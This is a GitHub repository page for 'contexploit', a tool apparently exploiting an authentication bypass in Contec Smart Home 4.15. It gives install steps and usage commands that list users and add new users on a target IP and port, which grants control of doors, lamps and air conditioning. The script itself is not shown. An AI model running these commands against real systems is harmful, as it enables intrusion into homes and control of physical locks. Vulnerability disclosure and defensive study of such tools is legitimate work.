Vulnerability description

the Vulnerability allow unauthenticated attacker to remotely bypass authentication and added new user without confirming.
after Successfully added new users, the attacker can control anything (lamps, doors, air conditioner, etc)

Contec smart home Unauthorized Users Added
Affected version : 4.15

want to know more about Contec Smart Home system ?
https://contec.co.il/en/

Installation steps

require 2 modules (bs4, requests)

Root@Linux: ~# pip install -r requirement.txt
or
Root@Linux: ~# pip install bs4 requests

Work in both python 2.x and 3.x
Tested on Linux and MAC os

Usage

to view users list
Root@Linux: ~# python ./contexploit.py -t https://(ip):(port) --list-user

to added new user
Root@Linux: ~# python ./contexploit.py -t https://(ip):(port) -u (NewUser) -p (NewPassword)

Name		Name	Last commit message	Last commit date
Latest commit History 7 Commits
LICENSE		LICENSE
README.md		README.md
contexploit.py		contexploit.py
requirement.txt		requirement.txt

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Vulnerability description

Installation steps

Usage

About

Releases

Packages

Languages

License

kuburan/contexploit

Folders and files

Latest commit

History

Repository files navigation

Vulnerability description

Installation steps

Usage

About

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages